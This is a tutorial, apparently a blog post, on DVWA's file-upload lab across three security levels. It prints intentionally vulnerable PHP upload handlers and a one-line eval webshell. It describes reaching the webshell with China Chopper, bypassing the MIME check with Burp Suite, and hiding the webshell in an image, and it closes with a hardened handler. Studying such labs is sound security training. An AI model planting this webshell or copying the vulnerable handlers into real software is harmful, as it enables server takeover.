1. In DVWA's low security level, i.e. when the site places no restriction at all on the type of uploaded file, the source code is as follows:
<pre class="wp-block-code"><code><?php
if (isset($_POST['Upload'])) {
    // Destination is built directly from the client-supplied file name
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    // No check on type, extension, size or content before the move
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}?></code></pre>
A small PHP webshell script can be uploaded, containing the following single line:
<pre class="wp-block-code"><code><?php @eval($_POST['password']) ?></code></pre>
After crawling the site to obtain its directory structure, a tool such as China Chopper (中国菜刀) is given the URL and the password pass (the password written into the PHP script), which connects to the site's backdoor, from where site files can be freely uploaded, downloaded and so on.
2. In the medium security level, the site restricts the MIME type of uploaded files; the source code is as follows:
<pre class="wp-block-code"><code><?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // 'type' is the Content-Type sent by the client, not derived from the file
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}?></code></pre>
Once the condition that only the JPEG MIME type is accepted has been added (for MIME types, see the reference table W3C provides: MIME 参考手册), our .php script can no longer be uploaded. At this point Burp Suite, which ships with the Kali attack machine, can be used as an intercepting proxy: after configuring the browser to use the proxy (how to add the proxy, or how to get Burp Suite to proxy the physical machine, will be published later), the file-submission request is intercepted under Proxy. Its Content-Type is application/octet-stream; changing it to jpeg (image/jpeg) is enough. After forwarding the request we find that the .php file uploads successfully, so this layer of filtering has been bypassed.
3. Finally, in the high security level, the source code is as follows:
<pre class="wp-block-code"><code><?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // Extension is whatever follows the last '.' in the client-supplied name
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    // Only the extension and size are checked; the file content is not inspected
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||
        $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}?></code></pre>
This time the filter is no longer based on the MIME type: the uploaded file must carry one of a fixed set of image extensions to succeed. Even if you use Burp Suite as an intercepting proxy and change the file's extension, you still cannot take control of the server through China Chopper, because a PHP file renamed with a .jpg extension is not parsed by the server. In that case an image webshell can be used instead: an image-webshell tool embeds the one-line webshell shown above inside an image, and that image is then uploaded. What follows involves the analysis of file inclusion vulnerabilities and will be published later.
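As an added example (not DVWA's own code), the following hardened handler closes the three gaps shown above: it whitelists a normalised extension, sniffs the file content server-side instead of trusting the client's Content-Type, re-encodes the image so that metadata-embedded payloads are dropped, and stores the result under a server-chosen name. It assumes PHP's GD and fileinfo extensions, a form field still named `uploaded`, and an upload directory on which PHP execution is disabled; the function names are hypothetical.

```php
<?php
// Added example, not DVWA's own code: a hardened replacement for the upload
// handler. Assumes the GD and fileinfo extensions and that $uploadDir is
// served with PHP execution disabled (e.g. php_admin_flag engine off).

function validate_jpeg_upload(array $file, int $maxSize = 100000): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload error';
    }
    if ($file['size'] > $maxSize) {
        return 'file too large';
    }
    // Explicit, lower-cased whitelist of the real extension (pathinfo), instead
    // of comparing the raw suffix against four literal spellings as above.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg'], true)) {
        return 'extension not allowed';
    }
    // Sniff the content server-side; $_FILES[...]['type'] comes straight from
    // the client's Content-Type header, which is what the Burp edit rewrote.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        return 'content is not a JPEG';
    }
    return null; // all checks passed
}

function store_jpeg_upload(array $file, string $uploadDir): string
{
    if (($err = validate_jpeg_upload($file)) !== null) {
        throw new RuntimeException($err);
    }
    // Decode and re-encode with GD: a non-image fails to decode, and the
    // re-encode drops EXIF/comment segments, where an image webshell keeps
    // its payload, so what lands on disk is pixel data only.
    $img = @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('image does not decode');
    }
    // Server-chosen random name: the client's filename never reaches disk.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';
    if (!imagejpeg($img, $dest, 90)) {
        throw new RuntimeException('could not write image');
    }
    return $dest;
}
```

Inside the `isset($_POST['Upload'])` branch, call `store_jpeg_upload($_FILES['uploaded'], DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads')` and turn a `RuntimeException` into the existing "Your image was not uploaded." message.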